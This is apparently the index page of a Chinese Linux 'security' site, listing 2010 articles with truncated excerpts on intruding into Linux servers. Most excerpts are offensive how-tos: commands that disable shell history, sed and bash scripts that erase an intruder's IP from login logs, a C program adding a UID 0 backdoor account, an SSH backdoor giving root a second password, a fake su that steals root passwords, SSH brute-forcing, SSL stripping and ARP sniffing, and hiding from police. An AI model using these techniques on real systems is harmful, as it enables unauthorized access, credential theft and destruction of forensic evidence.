Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

搜索:
您的位置: Linux安全网 > Linux安全 >
  • Linux安全# linux常用的入侵小技巧
  • 日期:2010-10-21 点击:6481 UPLOAD 侵入成功后,拿到root权限了,这个东东可以把他的服务器的访问权限改了,让任何人都可以上传文件 ! root 状 态 下, 运 行 Install 后, upload 将 允 许 普 通 用 户 上 载 文 件 至 任 何 目 录 下。 #chmod755install #./install $Content$nbsp;mo
  • Linux安全# 迂回攻击战术搞定入侵linux服务器
  • 日期:2010-10-21 点击:349今天本来和ay520一起检测一个网站的,无奈网站太过去强大,没有发现漏洞,于是我就开始了迂回攻击战术,什么是迂回攻击?我就来小介绍一下: 通常我们攻击一个网站的时候,由于不了解网站源码结构,也没有常见的漏洞,我们就可以先找出这个网站源码的一些特
  • Linux安全# Linux入侵技巧收集
  • 日期:2010-10-21 点击:2751. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 2. sed的一些邪恶用法 邪恶的替换到登录的IP和日志里的访问IP sed -s s/211.xxx.xxx.xxx/19
  • Linux安全# linux渗透:使用ettercap嗅探ssh口令
  • 日期:2010-10-21 点击:408通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。 如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。 但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样
  • Linux安全# linux入侵痕迹追踪与隐藏技巧
  • 日期:2010-10-18 点击:275前言: 被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的待遇。如何使自己在系统中隐藏的更深,是我们必须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的踏雪无痕。Fore
  • Linux安全# linux下利用SSLSTRIP突破SSL嗅探密码及防御
  • 日期:2010-10-18 点击:175准备工作 下载sslstrip,我们下载的是最新版本 ?wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz 访问这里http://www.thoughtcrime.org/software/sslstrip/获得更多帮助 安装: python setup.py install 开始之前先要打开 ip_forwo
  • Linux安全# webshell以root权限运行的linux提权笔记
  • 日期:2010-10-18 点击:398某日拿到某站webshell,redhat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。 1.webshell直接替换root密码: /etc/shadow // 记得备份 2.允许root通过ssh登陆: /etc/ssh/sshd_config PermitRootLogin yes #允许root登陆 3.重启ssh服务 ser
  • Linux安全# Linux渗透技巧+实战手记
  • 日期:2010-10-18 点击:194一.ldap渗透技巧 1.cat /etc/nsswitch 看看密码登录策略我们可以看到使用了file ldap模式 2.less /etc/ldap.conf base ou=People,dc=unix-center,dc=net 找到ou,dc,dc设置 3.查找管理员信息 匿名方式 ldapsearch -x -D cn=administrator,cn=People,dc=unix-c
  • Linux安全# 利用medusa破解linux ssh密码
  • 日期:2010-10-18 点击:423From 一不小心高潮了'blog 蛋疼,随手写一下,medusa破解起来还是比较快的,首先我们看看帮助 root@perl-exploit:/pentest/exploits/framework3 # medusa Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks jmk@foofus.net ALERT: Host i
  • Linux安全# Linux下暴力破解ssh密码的方法
  • 日期:2010-10-18 点击:979网络安全中最暴力的是什么?大家也许会异口同声地说:破解!。不错,破解往往被很多高手所不齿,尤其是暴力破解很多人都认为这是无能的表现。但是破解有的时候却是入侵中唯一且有效的方法。 tAFU t\c 远程破解相信大家都用过,我首推hydra。 http://freeworld
  • Linux安全# 创建linux后门总结 初级篇 中级篇 高级篇
  • 日期:2010-10-18 点击:208初级篇 最简单的方法,就是在口令 文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要 系统 管理 员检查口令文件就会漏馅了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C 程序 。 ++ backdoor/backdoor1.c #include main() { FI
  • Linux安全# 进入系统后如何隐藏自己?
  • 日期:2010-10-11 点击:182网络上有很多不同的日志清除程序,其中最好的是zap2。我编译后称为z2 在你获得root的访问权后立即运行z2这个程序。这个程序执行的非常快。 你可以使用finger @host.xxx来查看当前有说锹剂耍?邢腹鄄煲幌聄oot或admin的idle time(空闲时间) 来猜测他们是否离
  • Linux安全# 一个还算完美的linux日志清除脚本
  • 日期:2010-10-11 点击:457linux 日志清除脚本 #!/bin/bash echo linux clear log echo by knlve 2008-08-29 echo =============================== # chmod 777 log # ./log xx.xx.xx.xx And ./log root if [ -f /var/log/wtmp ];then cat /var/log/wtmp | grep -v $1 /var/log/temp1
  • Linux安全# 深入研究Linux日志清除
  • 日期:2010-10-10 点击:244深入Linux日志清除 记得在学校里的时候,看图书馆里的书,看到高深的黑客在入侵完事以后不是把全部日志清空,而是擦除关于自己登陆的那部分信息,当时真的以为是不可能的事情,当然了,当时连怎么全部删除日志也不知道,哈哈。 就在这几天,我终于知道了其中
  • Linux安全# 清空历史命令记录和清除登陆系统记录方法
  • 日期:2010-10-10 点击:7691、清除登陆系统成功的记录,也就是last命令看到的记录 [root@linuxzgf ~]echo /var/log/wtmp 此文件默认打开时乱码的,里面可以看到ip等等信息 验证过程 [root@linuxzgf ~]#last root pts/0 10.5.10.51 Thu Sep 2 00:59 still logged in root pts/2 10.5.10
  • Linux安全# 转一个截取root密码的脚本。貌似写的还不错
  • 日期:2010-10-10 点击:351今天大家來做一個簡單的..... 如何偷su密碼的shell script. ...... 有密碼能使鬼推磨....沒有密碼被root折磨....... 俗話說有加密的密碼最難懂..... 要如何輕鬆取得super user密碼..... 就要動點頭腦..... 假設先取得root 權限但不知道密碼...... 我們想要取
  • Linux安全# 提权后获取linux root密码的2种方法
  • 日期:2010-10-10 点击:421在webbackdoor本身是root(可能性小的可怜)或通过某漏洞溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧! 先看第一种,kpr-fakesu.c
  • Linux安全# 推荐Linux SSH后门,root账号两个密码SSH backdoor 最新linux roo
  • 日期:2010-10-10 点击:644记得把ssh版本号换成原来的.还有一些文件的日期记得还原。这后门还是可以的.可以让root账号有两个密码,不影响管理员正常登陆. 在includes.h 里面 修改密码,然后编译 安装.详细说明如下.下载地址在最下面. How to install ---------------- shell-#wget htt
  • Linux安全# Linux下ARP欺骗嗅探内部渗透测试
  • 日期:2010-06-27 点击:434Linux下ARP欺骗嗅探内部渗透测试 早就跟相关人员说过邮箱认证smtp和pop协议要做加密,否则在公司内网,太容易被人sniffer到明文密码了,另外邮箱密码和bbs公用, bbs也是采用的http协议,没有用https,这些都是问题。虽然我们控制的网络部分已经做过处理了,
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史